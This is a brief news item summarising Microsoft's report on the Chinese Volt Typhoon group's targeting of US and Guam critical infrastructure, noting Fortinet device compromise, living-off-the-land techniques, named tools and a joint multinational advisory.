Microsoft uncovered the active targeting of critical infrastructure organizations across the United States, including Guam, by a Chinese cyberespionage group called Volt Typhoon since at least mid-2021. The group’s focus encompasses various crucial sectors such as government, maritime, communications, manufacturing, information technology, utilities, transportation, construction, and education.
The Microsoft Threat Intelligence team reasonably believes that the Volt Typhoon campaign aims to develop capabilities that could disrupt vital communications infrastructure between the United States and the Asia region during future crises.
The attackers exploit an undisclosed zero-day vulnerability to compromise Internet-exposed Fortinet FortiGuard devices as their initial method of attack. Once they breach the networks of their targets, they employ a technique known as “living-off-the-land,” utilizing hands-on-keyboard activity and leveraging living-off-the-land binaries (LOLBins) like PowerShell, Certutil, Netsh, and the Windows Management Instrumentation Command-line (WMIC).
Furthermore, the group has been observed using open-source tools such as Fast Reverse Proxy (FRP), the credential-stealing tool Mimikatz, and the IP packet networking framework. A joint advisory declared by the FBI, NSA, CISA, and cybersecurity agencies from Australia, New Zealand, the United Kingdom, and Canada emphasizes these findings.
Story credit
